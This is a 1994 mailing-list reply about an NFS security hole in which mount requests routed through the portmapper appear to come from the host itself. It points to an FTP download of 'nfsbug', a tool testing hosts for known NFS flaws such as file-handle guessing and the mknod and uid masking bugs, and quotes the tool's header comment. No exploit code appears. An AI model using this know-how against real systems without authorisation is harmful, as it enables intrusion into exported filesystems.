Re: RPC protocol problem?
Steinar Haug (Steinar.Haug@runit.sintef.no)
Tue, 23 Aug 1994 18:27:42 +0200 (MET DST)
> I just read a post in comp.security.unix entitiled "widespread security hole
> in exporting of filesystems" which claims there are ways to break into a
> system that has filesystems exported to itself.
>
> Does anyone know anything about this? The post said "the trick is to make
> RPC requests via the portmapper, in such a way that they appear to the mount
> daemon to be coming from within the host itself."
>
> The post mentions a program that is "out there" to exploit this hole. If
> anyone has any knowledge of this, could you please post instructions on how
> to test for this.
Yes, this knowledge is widespread. Pick up the following program
which shows how to exploit this and other well known NFS problems.
I have enclosed the starting comment from the program at the end
of this message.
Host ftp.cs.vu.nl
Location: /leendert
FILE -rw-r--r-- 7597 May 16 15:15 nfsbug.aix.patch
FILE -r--r--r-- 3478 May 4 12:12 nfsbug.hpux.patch
FILE -r--r--r-- 36023 May 3 19:51 nfsbug.shar
Steinar Haug, SINTEF RUNIT, University of Trondheim, NORWAY
Email: Steinar.Haug@runit.sintef.no
-----------------------------------
/*
* nfsbug.c
*
* Test hosts for well known NFS problems/bugs. Among these tests are:
* find world wide exportable file systems, determine whether the
* export list really works, determine whether we can mount file systems
* through the portmapper, try to guess file handles, excercise the
* mknod bug, and the uid masking bug.
*
* Author:
* Leendert van Doorn, april 1994
*
* TODO:
* - close sockets (?)
*/